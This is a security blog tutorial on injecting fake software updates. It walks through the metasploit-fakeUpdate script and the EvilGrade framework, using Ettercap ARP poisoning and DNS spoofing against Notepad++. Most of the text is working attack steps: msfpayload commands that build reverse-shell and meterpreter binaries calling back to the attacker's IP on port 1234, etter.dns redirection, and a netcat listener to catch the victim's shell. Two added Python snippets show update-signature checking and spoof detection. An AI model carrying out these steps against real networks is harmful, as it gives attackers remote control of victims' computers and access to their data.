
Hacking AutoUpdate by Injecting Fake Updates

April 26, 2012 by Hari Krishnan

Works against Java, AppleUpdate, Google Analytics, Skype, Blackberry and more

Introduction

We all know that hackers are constantly trying to steal private information by getting into the victim's system, either by exploiting the software installed in the system or by some other means. According to one stat, more than 60 percent of Adobe Reader users have unpatched versions, leaving them vulnerable to attacks. By performing routine updates for their software, consumers can protect themselves, patching known vulnerabilities and therefore greatly reducing the chance of getting hacked.

Commonly used software such as MS Office, Adobe Flash and PDF reader (as well as the browsers themselves) is a major target for exploits if left unpatched. In the past, fake patches for Firefox, IE, etc. displayed messages informing users that an updated version of a plugin or the browser was available, prompting them to update their software. For example, the page tells the user that updating their Flash version is critical. Once the user clicks the fake update, it downloads malicious content (for example, the Zeus Trojan) to the victim's computer, perhaps along with a rogue anti-virus that asks the user to pay in order to remove the infections. Similar attacks have been carried out in the past against various browsers, too.

Normally, if there is an update for the Firefox browser, the update notification is displayed as a popup rather than as a webpage. A better way to check for an update in Firefox is to go to the Help option –> select "About Firefox." If the browser needs an update, it will display something that says "apply update."


If you are not sure about your applications:

  1. Check their official website or the website of the particular application.
  2. To check for plugin updates, go to the URL http://www.mozilla.org/en-US/plugincheck/. The page scans your Firefox for updates to the installed plugins and reports each plugin's status, such as whether it is vulnerable or needs updating.


Most people avoid updating since it can be annoying at times. But if we are handling sensitive information in our systems, then updating and patching up the important software should be of high priority.

When you think about it, how many people are really cautious about the updates, the type of update or the link from where they are downloading and installing the update? Obviously, there are very few people that are really cautious and vigilant about updates, therefore making the success rates for those exploiting the users high. One effective way of exploiting users is by using tools like EvilGrade.

Before moving on to EvilGrade, let's have a look at a bash script which can automate a Man-in-the-Middle attack and exploit the user by providing a fake update. This is done by setting up a DHCP and web server. Once that is done, create an exploit using msf and wait for the victim to connect to your fake update server and run the exploit. Once the fake update has been executed, the victim's PC is exploited and grants access to the victim's system. We also have options like sniffing, using the dsniff suite, in order to spy on the victim.

We can extract the bash script via tar zxf metasploit-fakeUpdate[v0.1.4].tar.gz and copy the contents of the 'www' folder to /var/www (cp www/* /var/www/). Now edit metasploit-fakeUpdate.sh to set your "internet" interface, and run bash metasploit-fakeUpdate.sh. Once these steps are performed, wait for the target to connect for further exploitation.

The commands are as follows:

tar zxf metasploit-fakeUpdate[v0.1.4].tar.gz

cd metasploit-fakeUpdate[v0.1.4]

cp www/* /var/www

ifconfig

kate metasploit-fakeUpdate.sh

bash metasploit-fakeUpdate.sh

About EvilGrade:

EvilGrade is a framework which exploits weaknesses in the auto-update services of multiple common software packages, and the attack performed by this framework is one of the best examples of client exploitation. The framework tricks the service into believing there is a signed update available for the product, thus prompting the user to install the upgrade, where the upgrade is the attacker's payload. This type of attack is a bit difficult for a normal user to detect, since they don't see anything suspicious and the upgrade looks legitimate.

We can use this framework in combination with DNS spoofing or a Man-in-the-Middle attack in order to spoof the software upgrade. This tricks the victim into downloading the upgrade, thereby executing our malicious arbitrary code.

EvilGrade supports various well-known software like Notepad, iTunes, Java plug-in, WinZip, Winamp, DAP, OpenOffice, LinkedIn, Speedbit, etc.

EvilGrade takes advantage of these applications because most of them verify neither the update contents nor the master update server. Basically, in this type of attack, the attacker seeks to modify the victim's DNS traffic so that lookups return some other IP address controlled by the attacker.

General update process scenario:

An application starts the update process and sends a request to its DNS server for the update host (for example, update.notepadplus.com). The DNS server replies with some information. The application then gets the file lastupdate.xml from update.app1.com and analyzes the update file. If it detects a new update, it will then install it.


Sample figure of general update process
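The missing check in the update process above (neither the update file nor the binary is verified) can be sketched as follows. This is an added example, not code from EvilGrade or from any of the listed applications; the manifest schema, the sample data and the demo key (built from two Mersenne primes so that it runs on the standard library alone) are assumptions.

```python
import hashlib
import hmac
import xml.etree.ElementTree as ET

# Constructed demo key built from two Mersenne primes: NOT secure, it only
# lets the example run on the standard library. A real updater embeds the
# vendor's public key and verifies with a vetted crypto library.
P, Q = 2**521 - 1, 2**607 - 1
N, E = P * Q, 65537                    # public key, shipped inside the application
D = pow(E, -1, (P - 1) * (Q - 1))      # private key, stays on the vendor's build server
K = (N.bit_length() + 7) // 8          # modulus length in bytes

# DER DigestInfo prefix for SHA-256 (RFC 8017, section 9.2)
SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")


def _pkcs1_encode(data: bytes) -> bytes:
    """EMSA-PKCS1-v1_5 encoding of SHA-256(data), K bytes long."""
    t = SHA256_PREFIX + hashlib.sha256(data).digest()
    return b"\x00\x01" + b"\xff" * (K - len(t) - 3) + b"\x00" + t


def vendor_sign(data: bytes) -> bytes:
    """Vendor side: sign the manifest at release time."""
    return pow(int.from_bytes(_pkcs1_encode(data), "big"), D, N).to_bytes(K, "big")


def signature_ok(data: bytes, signature: bytes) -> bool:
    """Client side: RSASSA-PKCS1-v1_5 verification against the embedded key."""
    s = int.from_bytes(signature, "big")
    if len(signature) != K or s >= N:
        return False
    return hmac.compare_digest(pow(s, E, N).to_bytes(K, "big"), _pkcs1_encode(data))


def accept_update(manifest: bytes, signature: bytes, binary: bytes) -> bool:
    """Install only if the manifest is vendor-signed and the binary matches it."""
    if not signature_ok(manifest, signature):
        return False                   # manifest was not produced with the vendor key
    expected = ET.fromstring(manifest).findtext("sha256", default="")
    return hmac.compare_digest(expected, hashlib.sha256(binary).hexdigest())


# Constructed sample data (hypothetical manifest schema, not a real lastupdate.xml)
GENUINE = b"genuine installer bytes"
MANIFEST = (b"<update><version>6.1</version><sha256>"
            + hashlib.sha256(GENUINE).hexdigest().encode() + b"</sha256></update>")
SIGNATURE = vendor_sign(MANIFEST)
```

With this check in place, a binary served from a redirected update host is rejected unless whoever serves it also holds the vendor's signing key.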

You can download the ISR-evilgrade from http://www.infobytesec.com/down/isr-evilgrade-2.0.0.tar.gz

Steps to install EvilGrade:

Step 1: Download and extract the EvilGrade http://www.infobytesec.com/down/isr-evilgrade-2.0.0.tar.gz. To extract, the command is

tar xvfz isr-evilgrade-2.0.0.tar.gz

Step 2: Download the required Perl module if necessary and run the evilgrade by using the command

$ ./evilgrade

Note: Sometimes, while running EvilGrade, we may get an error like the one below

Can't locate Data/Dump.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at isrcore/Shell.pm line 28.

To solve this, run the following command in a terminal: cpan Data::Dump


Before attacking the target machine, we may need to investigate the target application. We'll need to create a fake update using EvilGrade to inject into the victim's computer.

To list the supported applications, use the command show modules in the console. The listed modules are shown below.

allmynotes
amsn
appleupdate
apptapp
apt
atube
autoit3
bbappworld
blackberry
bsplayer
ccleaner
clamwin
cpan
cygwin
dap
divxsuite
express_talk
fcleaner
filezilla
flashget
flip4mac
freerip
getjar
gom
googleanalytics
growl
isopen
istat
itunes
jet
jetphoto
linkedin
miranda
mirc
nokia
nokiasoftware
notepadplus
openoffice
opera
orbit
osx
paintnet
panda_antirootkit
photoscape
quicktime
skype
sparkle
speedbit
sunbelt
sunjava
superantispyware
teamviewer
techtracker
trillian
ubertwitter
vidbox
virtualbox
vmware
winamp
winscp
winupdate
winzip
yahoomsn


In this example, let's target Notepad++ by creating a malicious upgrade. To configure a specified module, the simple command would be

evilgrade>configure notepadplus

To view the options for the selected module, use the command "show options".


Note: Here in the image, the "VirtualHost" address is important – it will be used later on to perform the attack.

The next step is setting up the agent. The agent is nothing more than our fake update binary. We have to set the path where it is located; we can also generate the fake update binary dynamically, producing any Metasploit payload or using any other interface to create the binary. We can configure the agent with our payload using msfpayload, for example shell_reverse_tcp. We can create the payload either within the EvilGrade console or outside the framework and then call it when required.

Method 1: To create the payload within EvilGrade, the command which we are going to use is

evilgrade (notepadplus)>set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.75.130 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]'

Here, we are setting up the fake update binary with the payload "windows/shell_reverse_tcp", using a reverse shell to connect to address 192.168.75.130 (the attacker's IP address) on port 1234. The label <%OUT%><%OUT%> is a special tag that marks where the output binary is going to be generated.

Method 2: Create a payload outside the EvilGrade using msfpayload.

[root@bt]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.75.130 LPORT=1234 X > /tmp/reverse-shell.exe

Now, we can call this payload within EvilGrade by the following command.

evilgrade(notepadplus)>set agent /tmp/reverse-shell.exe


Once this is all set, we need to start the EvilGrade server. This is done again by a simple command named start.

Now the server has been started. The next step would be configuring the Man in the Middle attack using Ettercap. As I said earlier, EvilGrade, along with the combination of DNS spoofing or Man-in-the-middle attack, can be used to trick the victim. So let's configure etter.dns.

pico /usr/share/ettercap/etter.dns


Here we need to change the VirtualHost address to our IP address, i.e., notepad-plus.sourceforge.net = attacker's IP address.

Once it's configured, let's fire up Ettercap, since it's a good tool for performing MITM attacks over the LAN.

To fire up Ettercap, type the command in the terminal: ettercap -G

Click Sniff –> Unified sniffing –> choose your network interface card. Here it's eth0.


Once your network interface card is selected, enable the dns_spoof plugin by double clicking on it. This plugin can be used to redirect the request from victim to Evilgrade server. Click Plugins –> Manage the plugins –> Double click dns_spoof.


Now let's scan hosts in our network. Click Hosts –> Scan for hosts.


Once the scan for host is performed, select host list to view the hosts found in the network. The result would be similar to this


We also need to perform an MITM attack to intercept all data on the network. Click Mitm –> Arp poisoning –> check "Sniff remote connection". Before we start sniffing, there is another important thing we should do to set up the target. Add the router address to target 1 by clicking "Add to Target 1" and, similarly, the victim's IP address to target 2 by clicking "Add to target 2".

Once the sniffing has started, use Netcat for listening to the particular port defined in the Evilgrade. In this case, it is 1234.


Now, just wait for the victim to open Notepad++. Once they open it, they will get a pop-up asking for an update. If the victim follows through with the upgrade, you will get their shell, from where we can further exploit them or do something else, depending on your imagination.

    

Conclusion:

EvilGrade is a very powerful tool for penetrating into a remote system. With the help of tools like Ettercap, its lethality is further enhanced. The framework is platform independent, i.e. the tool can penetrate any system whose update session can be hijacked. Mitigation for this kind of attack has not been one hundred percent achieved. One protection against this could be for the user to simply steer clear of any update coming from an unknown network.

The best part of this tool is that the attack is not meant only for attacking Windows systems, but any vulnerable update mechanism. The only thing that the attacker has to do is hijack the update process on a targeted computer over the network. After that, game over.
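Both network-level steps of the attack described above, ARP poisoning and DNS spoofing, leave traces that a defender on the LAN can check for. The following is an added example, not part of the original article or of any tool it mentions; the Linux `arp -a` output format, the gateway address 192.168.75.2 and the sample data are assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Matches Linux `arp -a` lines: "? (10.0.0.1) at aa:bb:cc:dd:ee:ff [ether] on eth0"
ARP_LINE = re.compile(r"\((?P<ip>[\d.]+)\) at (?P<mac>[0-9a-f:]{17})", re.I)


def shared_macs(arp_output):
    """Return {mac: [ips]} for every MAC address claimed by more than one IP."""
    by_mac = defaultdict(list)
    for m in ARP_LINE.finditer(arp_output):
        by_mac[m["mac"].lower()].append(m["ip"])
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def poisoned_gateway(arp_output, gateway_ip):
    """Return the MAC that the gateway shares with another host, or None."""
    for mac, ips in shared_macs(arp_output).items():
        if gateway_ip in ips:
            return mac
    return None


def spoofed_answers(dns_answers, watched_hosts):
    """Flag public update hosts answered with a private, loopback or link-local IP."""
    flagged = []
    for host in watched_hosts:
        for addr in dns_answers.get(host, []):
            ip = ipaddress.ip_address(addr)
            if ip.is_private or ip.is_loopback or ip.is_link_local:
                flagged.append((host, addr))
    return flagged


# Constructed sample data: the gateway address 192.168.75.2 is an assumption.
ARP_POISONED = """\
? (192.168.75.2) at 00:0c:29:aa:bb:cc [ether] on eth0
? (192.168.75.130) at 00:0c:29:aa:bb:cc [ether] on eth0
? (192.168.75.131) at 00:0c:29:11:22:33 [ether] on eth0
"""
ARP_CLEAN = ARP_POISONED.replace("(192.168.75.2) at 00:0c:29:aa:bb:cc",
                                 "(192.168.75.2) at 00:50:56:e0:0f:01")
DNS_SEEN = {"notepad-plus.sourceforge.net": ["192.168.75.130"]}

if __name__ == "__main__":
    print(poisoned_gateway(ARP_POISONED, "192.168.75.2"))
    print(spoofed_answers(DNS_SEEN, ["notepad-plus.sourceforge.net"]))
```

A host with several addresses on one interface also shares a MAC, so the gateway check is the stronger signal. Watch only update hosts that are expected to resolve to public addresses, since an internal update mirror legitimately returns a private one.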


Hari Krishnan

Hari Krishnan works as a security and bug researcher for a private firm, as well as InfoSec Institute. His interests largely encompass web application security issues. Hari is also an organizer for Defcon Chennai (http://www.defcontn.com).